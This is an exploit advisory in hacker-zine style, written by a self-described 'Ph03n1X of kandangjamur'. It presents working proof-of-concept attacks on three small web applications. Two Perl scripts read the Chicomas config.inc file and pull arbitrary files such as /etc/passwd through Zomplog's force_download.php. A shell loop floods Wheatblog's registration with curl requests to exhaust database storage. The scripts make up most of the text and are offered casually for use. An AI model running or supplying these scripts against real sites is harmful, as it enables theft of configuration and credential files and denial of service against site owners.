##############################################
##Vulnerability in Multiple Web Application 
## I Can't Hack Website Application :( 		
##############################################

#I just need some games, Reviewing web application
#in a night long #############
#Just For Fun - Just For Shit - Stupid 0day 
#Lamme web bugs, lamme advisory, nothing special

#############################################
## Chicomos Configuration File Disclosoure 
## Low risk severity 		
## Use .htacces to protect config.inc	  
#############################################

Stupid PoC :

#!/usr/bin/perl
#Chicomas Configuration File disclosure
#Read Installation Guide in folder doc/install.en.txt
#After installation, config.inc file is created in chicomas installation path
#By default install, config.inc is public readable

if(!$ARGV[1])
{
        print "Ph03n1X of kandangjamur\n";
        print "Use : perl $0 <website> <chicomas path>\n";
        print "Example : perl $0 example.com /chicomas/\n";
        exit;
}
use IO::Socket;
$s = new IO::Socket::INET(
        Proto => "tcp",
        PeerAddr => $ARGV[0],
        PeerPort => "80",
);
$req=$ARGV[1]."config.inc";
print $s "GET $req\r\nHTTP/1.1\r\nHost: $ARGV[0]\r\n\r\n\r\n";
while(<$s>){
        print;
}
close $s;


#################################################
## ZompLog Blog Arbitrary File Disclosoure 
## Low-Medium Risk Severity			
#################################################

Stupid PoC :

#!/usr/bin/perl
#Zomplog 3.8.2 Arbitrary Files Download
#

if(!$ARGV[2])
{
        print "Ph03n1X of kandangjamur | king_purba@yahoo.co.uk\n";
        print "Use : perl $0 <website> <zomplog path> <file>\n";
        print "Example : perl $0 example.com /zlog/ /etc/passwd\n";
        exit;
}
use IO::Socket;
$s = new IO::Socket::INET(
        Proto => "tcp",
        PeerAddr => $ARGV[0],
        PeerPort => "80",
);
$req=$ARGV[1]."upload/force_download.php?file=".$ARGV[2];
print $s "GET $req\r\nHTTP/1.1\r\nHost: $ARGV[0]\r\n\r\n\r\n";
while(<$s>){
        print;
}
close $s;


###################################################
##Wheatlog Auto Create User 	           
##Database Storage Flooding/DoS		
## Low-Medium Risk Severity			
###################################################

Stupid PoC :

#!/bin/sh
#Autocreate User Wheatblog version < 1.1
#Impact : Storage Flooding/DoS
#Ph03n1X / kandangjamur
i=1
while [ TRUE ]
do 
curl -d "login=userqu$i&password=taiklah123&email=aoqu$i@webku$i.com" http://example.com/testing/wblog/registration.php?action=process
let i++
done
#EOF


####################################################
## FINISH THIS STUFF							
####################################################